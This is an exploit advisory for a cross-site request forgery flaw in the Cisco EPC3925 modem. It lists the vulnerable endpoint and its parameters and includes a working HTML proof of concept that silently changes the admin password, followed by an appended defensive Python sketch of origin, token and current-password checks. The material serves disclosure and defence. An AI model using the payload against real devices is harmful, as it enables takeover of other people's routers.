Cisco EPC3925 Cross Site Request Forgery

2013-12-16 / 2013-12-21
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#######################################################################
# Exploit Title: Cisco EPC3925 Cross Site Request Forgery
# Google Dork: N/A
# Date: 12-11-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.cisco.com
# Software Link: Not public
# Version: epc3925-E10-5-v302r125572-130520c
# Tested on: Cisco EPC3925
# CVE: N/A
#######################################################################
# Description:
#
# This proof of concept demonstrates that the admin password can be
# changed by an attacker in a CSRF attack. However, it seems like any
# setting in the device can be manipulated using an attack like this.
#
#
# Side note: The device does not ask for the current password.
#
#
# Location:
#
# POST http://[target]/goform/Quick_setup
#
# Parameters:
#
# Password=&PasswordReEnter=&save=Save+Settings
#
# PoC:
#
# <html>
#
# <form name="reseller" method="POST" action="http://[target]/goform/Quick_setup" id="csrf_attack" target="csrf_iframe">
# <input type="hidden" name="Password" value="attackers_password">
# <input type="hidden" name="PasswordReEnter" value="attackers_password">
# <input type="hidden" name="save" value="Save Settings">
# </form>
#
# <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe>
#
# <script>
# document.getElementById('csrf_attack').submit();
# </script>
# <center>The payload has been executed....</center>
#
# </html>
#
# Check out the video at: http://www.nerdbox.it/cisco-epc3925-csrf-vulnerability/

References:

http://www.nerdbox.it/cisco-epc3925-csrf-vulnerability/
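
The server-side checks whose absence the advisory describes, sketched as an added example (not code from the advisory, its author or the vendor): a same-origin test, a per-session anti-CSRF token and confirmation of the current password before a password change is accepted. The field names csrf_token and CurrentPassword, the device address, the token and the passwords are assumptions constructed for the example; Password, PasswordReEnter and save are the parameters listed above.

```python
import hmac
from urllib.parse import urlsplit

def same_origin(headers):
    """True only if Origin (or, failing that, Referer) names the host that was addressed."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed when neither header is present
    parts = urlsplit(source)
    host = headers.get("Host", "").lower()
    return parts.scheme in ("http", "https") and bool(host) and parts.netloc.lower() == host

def check_password_change(headers, form, session, verify_current):
    """Return (allowed, reason) for a POST to the password-change handler."""
    if not same_origin(headers):
        return False, "cross-origin request"
    # csrf_token and CurrentPassword are hypothetical fields, not part of the device's form.
    token = form.get("csrf_token", "")
    if not token or not hmac.compare_digest(token.encode(), session["csrf_token"].encode()):
        return False, "missing or wrong CSRF token"
    if not verify_current(form.get("CurrentPassword", "")):
        return False, "current password not confirmed"
    if not form.get("Password") or form["Password"] != form.get("PasswordReEnter"):
        return False, "new password empty or mismatched"
    return True, "ok"

# Constructed sample data (addresses, token and passwords are made up for the example).
SESSION = {"csrf_token": "3f9c1a7e5b2d4c68"}
def verify_current(pw):
    return hmac.compare_digest(pw.encode(), b"old-admin-pw")

# Shape of the request the advisory's PoC form produces: foreign Origin, no token.
FORGED = ({"Host": "192.168.0.1", "Origin": "http://attacker.example"},
          {"Password": "x", "PasswordReEnter": "x", "save": "Save Settings"})
# Same fields posted from the device's own page, with the two added fields.
LEGIT = ({"Host": "192.168.0.1", "Origin": "http://192.168.0.1"},
         {"Password": "n3w-pw", "PasswordReEnter": "n3w-pw", "save": "Save Settings",
          "csrf_token": "3f9c1a7e5b2d4c68", "CurrentPassword": "old-admin-pw"})

if __name__ == "__main__":
    for name, (headers, form) in (("forged", FORGED), ("legit", LEGIT)):
        print(name, check_password_change(headers, form, SESSION, verify_current))
```

The three checks are independent layers: the token and the current-password prompt still stop the forged request if a proxy strips the Origin and Referer headers and the origin test is relaxed.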

